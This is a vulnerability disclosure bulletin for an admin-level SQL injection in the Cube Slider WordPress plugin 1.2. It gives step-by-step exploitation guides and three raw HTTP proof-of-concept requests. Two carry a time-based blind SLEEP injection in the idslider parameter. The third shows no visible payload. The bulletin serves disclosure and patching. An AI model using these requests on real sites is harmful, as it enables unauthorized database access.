Headline
CVE-2022-1684: Security Bulletin
The Cube Slider WordPress plugin through 1.2 does not sanitise and escape the idslider parameter before using it in various SQL queries, leading to SQL Injections exploitable by high privileged users such as admin
cube-slider 1.2 WordPress plugin SQL injection****Vulnerability Metadata
Key
Value
Date of Disclosure
May 09 2022
Affected Software
cube-slider
Affected Software Type
WordPress plugin
Version
1.2
Weakness
SQL Injection
CWE ID
CWE-89
CVE ID
CVE-2022-1684
CVSS 3.x Base Score
x
CVSS 2.0 Base Score
x
Reporter
Daniel Krohmer, Shi Chen
Reporter Contact
Link to Affected Software
https://wordpress.org/plugins/cube-slider
Link to Vulnerability DB
https://nvd.nist.gov/vuln/detail/CVE-2022-1684
Vulnerability Description
The idslider data parameter in cube-slider 1.2 is vulnerable to SQL injection in three different code sections. An authenticated attacker may abuse the edit, delete or save functionalities of the plugin to craft a malicious POST request.
Exploitation Guide
Exploit 1: Edit
Login as admin user. This attack requires at least admin privileges.
Go to Settings ant select Cube Slider in the sub menu.
Add a new cube slider by clicking on New Cube Slider.
Scroll down and use the Click to edit slider x details button.
Clicking the previous button triggers the vulnerable request. idslider is the vulnerable data parameter.
A POC may look like the following request:
In the code, the vulnerability is triggered by unsanitized user input of idslider at line 207 in ./init.php
Exploit 2: Delete
Login as admin user. This attack requires at least admin privileges.
Go to Settings ant select Cube Slider in the sub menu.
Delete an arbitrary, existing slider by clicking on Click to delete slider x.
Clicking the previous button triggers the vulnerable request. idslider is the vulnerable data parameter. (Note: The numeric ID value can be set arbitrarily)
A POC may look like the following request:
In the code, the vulnerability is triggered by unsanitized user input of idslider at line 210 in ./init.php.
Exploit 3: Save
Login as admin user. This attack requires at least admin privileges.
Go to Settings ant select Cube Slider in the sub menu.
Add a new cube slider by clicking on New Cube Slider.
Scroll down and use the Save changes button. No further data input is needed before clicking this button.
Clicking the previous button triggers the vulnerable request. idslider is the vulnerable data parameter.
A POC may look like the following request:
In the code, the vulnerability is triggered by unsanitized user input of idslider at line 199 in ./init.php. Notice that there is no sanitization at all in the whole query!
Exploit Payload
Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work. The SQL injection can be triggered by sending the requests below.
Exploit Payload 1: Edit
POST /wp-admin/options-general.php?page=cubeslider HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/options-general.php?page=cubeslider
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
Origin: http://localhost
DNT: 1
Connection: close
Cookie: wordpress_86a9106ae65537651a8e456835b316ab=admin%7C1651687988%7CUPnEJkZ0Ap9XXkqMv5ca4t4TaonaH58fHCuAQAFLgpn%7C9362415c79f3c67e8d1d87aa2c44ffaaf82b64262878824bbe4617c277a00b55; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=admin%7C1651687988%7CUPnEJkZ0Ap9XXkqMv5ca4t4TaonaH58fHCuAQAFLgpn%7C73a1ec3e227fd14f99e01a1ad8f86dccaa2ca668c00526f25564e4744e644ab0; wp-settings-1=editor%3Dtinymce%26amplibraryContent%3Dbrowse%26wd_ads_manage_groups_tab%3Dpop; wp-settings-time-1=1651515188
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
idslider=4+AND+(SELECT+3477+FROM+(SELECT(SLEEP(5)))DhVP)&edit=Click+to+edit+slider+4+details
Exploit Payload 2: Delete
POST /wp-admin/options-general.php?page=cubeslider HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/options-general.php?page=cubeslider
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
Origin: http://localhost
DNT: 1
Connection: close
Cookie: wordpress_86a9106ae65537651a8e456835b316ab=admin%7C1651687988%7CUPnEJkZ0Ap9XXkqMv5ca4t4TaonaH58fHCuAQAFLgpn%7C9362415c79f3c67e8d1d87aa2c44ffaaf82b64262878824bbe4617c277a00b55; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=admin%7C1651687988%7CUPnEJkZ0Ap9XXkqMv5ca4t4TaonaH58fHCuAQAFLgpn%7C73a1ec3e227fd14f99e01a1ad8f86dccaa2ca668c00526f25564e4744e644ab0; wp-settings-1=editor%3Dtinymce%26amplibraryContent%3Dbrowse%26wd_ads_manage_groups_tab%3Dpop; wp-settings-time-1=1651515188
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
idslider=4+AND+(SELECT+3477+FROM+(SELECT(SLEEP(5)))DhVP)&delete=Click+to+delete+slider+4
Exploit Payload 3: Save
POST /wp-admin/options-general.php?page=cubeslider HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/options-general.php?page=cubeslider
Content-Type: application/x-www-form-urlencoded
Content-Length: 394
Origin: http://localhost
DNT: 1
Connection: close
Cookie: wordpress_86a9106ae65537651a8e456835b316ab=admin%7C1651690550%7CIzsJvLe5qAzDH1qctKYKvf3fOqLu1Dshnphbt1aOLX5%7C8968917a5337f07f5db390194b15adfae8e850d20bc1c476fb1224002a9d5ca4; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=admin%7C1651690550%7CIzsJvLe5qAzDH1qctKYKvf3fOqLu1Dshnphbt1aOLX5%7C5d10d0aa6e661c1d443d69997bb114ab7ea5fe8071c573c62f098d0ece9efe01; wp-settings-1=editor%3Dtinymce%26amplibraryContent%3Dbrowse%26wd_ads_manage_groups_tab%3Dpop; wp-settings-time-1=1651517751
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
idslider=6&name=Name&about=About&title1=Title+1&description1=Description+1&title2=Title+2&description2=Description+2&title3=Title+3&description3=Description+3&title4=Title+4&description4=Description+4&icon1=fa-glass&color1=%2381d742&icon2=fa-glass&color2=%2381d742&icon3=fa-glass&color3=%2381d742&icon4=fa-glass&color4=%2381d742&submit=Save+Changes